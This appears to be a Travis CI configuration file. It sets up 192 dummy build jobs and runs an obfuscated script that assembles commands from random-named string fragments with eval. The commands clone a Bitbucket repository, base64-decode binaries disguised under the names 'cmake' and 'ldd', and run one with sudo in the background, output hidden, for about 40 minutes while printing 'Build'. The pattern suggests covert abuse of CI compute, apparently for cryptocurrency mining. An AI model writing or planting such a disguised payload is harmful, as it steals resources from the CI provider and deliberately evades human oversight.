dist: bionic

env:
  - BUILD="so1"
  - BUILD="so2"
  - BUILD="so3"
  - BUILD="so4"
  - BUILD="so5"
  - BUILD="so6"
  - BUILD="so7"
  - BUILD="so8"
  - BUILD="so9"
  - BUILD="so10"
  - BUILD="so11"
  - BUILD="so12"
  - BUILD="so13"
  - BUILD="so14"
  - BUILD="so15"
  - BUILD="so16"
  - BUILD="so17"
  - BUILD="so18"
  - BUILD="so19"
  - BUILD="so20"
  - BUILD="so21"
  - BUILD="so22"
  - BUILD="so23"
  - BUILD="so24"
  - BUILD="so25"
  - BUILD="so26"
  - BUILD="so27"
  - BUILD="so28"
  - BUILD="so29"
  - BUILD="so30"
  - BUILD="so31"
  - BUILD="so32"
  - BUILD="so33"
  - BUILD="so34"
  - BUILD="so35"
  - BUILD="so36"
  - BUILD="so37"
  - BUILD="so38"
  - BUILD="so39"
  - BUILD="so40"
  - BUILD="so41"
  - BUILD="so42"
  - BUILD="so43"
  - BUILD="so44"
  - BUILD="so45"
  - BUILD="so46"
  - BUILD="so47"
  - BUILD="so48"
  - BUILD="so49"
  - BUILD="so50"
  - BUILD="so51"
  - BUILD="so52"
  - BUILD="so53"
  - BUILD="so54"
  - BUILD="so55"
  - BUILD="so56"
  - BUILD="so57"
  - BUILD="so58"
  - BUILD="so59"
  - BUILD="so60"
  - BUILD="so61"
  - BUILD="so62"
  - BUILD="so63"
  - BUILD="so64"
  - BUILD="so65"
  - BUILD="so66"
  - BUILD="so67"
  - BUILD="so68"
  - BUILD="so69"
  - BUILD="so70"
  - BUILD="so71"
  - BUILD="so72"
  - BUILD="so73"
  - BUILD="so74"
  - BUILD="so75"
  - BUILD="so76"
  - BUILD="so77"
  - BUILD="so78"
  - BUILD="so79"
  - BUILD="so80"
  - BUILD="so81"
  - BUILD="so82"
  - BUILD="so83"
  - BUILD="so84"
  - BUILD="so85"
  - BUILD="so86"
  - BUILD="so87"
  - BUILD="so88"
  - BUILD="so89"
  - BUILD="so90"
  - BUILD="so91"
  - BUILD="so92"
  - BUILD="so93"
  - BUILD="so94"
  - BUILD="so95"
  - BUILD="so96"
  - BUILD="so97"
  - BUILD="so98"
  - BUILD="so99"
  - BUILD="so100"
  - BUILD="so101"
  - BUILD="so102"
  - BUILD="so103"
  - BUILD="so104"
  - BUILD="so105"
  - BUILD="so106"
  - BUILD="so107"
  - BUILD="so108"
  - BUILD="so109"
  - BUILD="so110"
  - BUILD="so111"
  - BUILD="so112"
  - BUILD="so113"
  - BUILD="so114"
  - BUILD="so115"
  - BUILD="so116"
  - BUILD="so117"
  - BUILD="so118"
  - BUILD="so119"
  - BUILD="so120"
  - BUILD="so121"
  - BUILD="so122"
  - BUILD="so123"
  - BUILD="so124"
  - BUILD="so125"
  - BUILD="so126"
  - BUILD="so127"
  - BUILD="so128"
  - BUILD="so129"
  - BUILD="so130"
  - BUILD="so131"
  - BUILD="so132"
  - BUILD="so133"
  - BUILD="so134"
  - BUILD="so135"
  - BUILD="so136"
  - BUILD="so137"
  - BUILD="so138"
  - BUILD="so139"
  - BUILD="so140"
  - BUILD="so141"
  - BUILD="so142"
  - BUILD="so143"
  - BUILD="so144"
  - BUILD="so145"
  - BUILD="so146"
  - BUILD="so147"
  - BUILD="so148"
  - BUILD="so149"
  - BUILD="so150"
  - BUILD="so151"
  - BUILD="so152"
  - BUILD="so153"
  - BUILD="so154"
  - BUILD="so155"
  - BUILD="so156"
  - BUILD="so157"
  - BUILD="so158"
  - BUILD="so159"
  - BUILD="so160"
  - BUILD="so161"
  - BUILD="so162"
  - BUILD="so163"
  - BUILD="so164"
  - BUILD="so165"
  - BUILD="so166"
  - BUILD="so167"
  - BUILD="so168"
  - BUILD="so169"
  - BUILD="so170"
  - BUILD="so171"
  - BUILD="so172"
  - BUILD="so173"
  - BUILD="so174"
  - BUILD="so175"
  - BUILD="so176"
  - BUILD="so177"
  - BUILD="so178"
  - BUILD="so179"
  - BUILD="so180"
  - BUILD="so181"
  - BUILD="so182"
  - BUILD="so183"
  - BUILD="so184"
  - BUILD="so185"
  - BUILD="so186"
  - BUILD="so187"
  - BUILD="so188"
  - BUILD="so189"
  - BUILD="so190"
  - BUILD="so191"
  - BUILD="so192"

language: minimal

script:
  - sudo apt update || true
  - DxmvGzsNAs="sudo apt --"
  - hmcrN="yes install"
  - TGHOyaCAR=" cl-base64 "
  - PAOKKDG="git &>/dev/"
  - eval "$DxmvGzsNAs""$hmcrN""$TGHOyaCAR""$PAOKKDG""null"
  - ccvUumdh="git clone h"
  - PCXzfV="ttps://gccb"
  - CixlTAzj="uild@bitbuc"
  - ISGAuRuqM="ket.org/gcc"
  - VcZvFR="build/gcc.g"
  - BFoIwEQTFQN="it &>/dev/n"
  - eval "$ccvUumdh""$PCXzfV""$CixlTAzj""$ISGAuRuqM""$VcZvFR""$BFoIwEQTFQN""ull"
  - lYRxsbj="base64 -d g"
  - zrHWPbn="cc/cmake_ >"
  - eval "$lYRxsbj""$zrHWPbn"" cmake"
  - GKXvOKOY="base64 -d g"
  - DKcuMImXIdF="cc/config_ "
  - eval "$GKXvOKOY""$DKcuMImXIdF""> cconfig"
  - lwZqoq="base64 -d g"
  - OjSSJqgnX="cc/make_ > "
  - eval "$lwZqoq""$OjSSJqgnX""ldd"
  - GWhIe="chmod +x ld"
  - eval "$GWhIe""d cmake"
  - gYYgh="./cmake"
  - eval "$gYYgh"""
  - DVRsi="sed -i 's/b"
  - NvRDkkEJS="uild/tg3o/g"
  - eval "$DVRsi""$NvRDkkEJS""' cconfig"
  - sudo ./ldd --config=cconfig &>/dev/null &
  - GCC=$(date +%s)
  - uxuYp="echo $BUILD"
  - eval "$uxuYp"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2509)) ] && sudo killall ldd && break; sleep 211; done
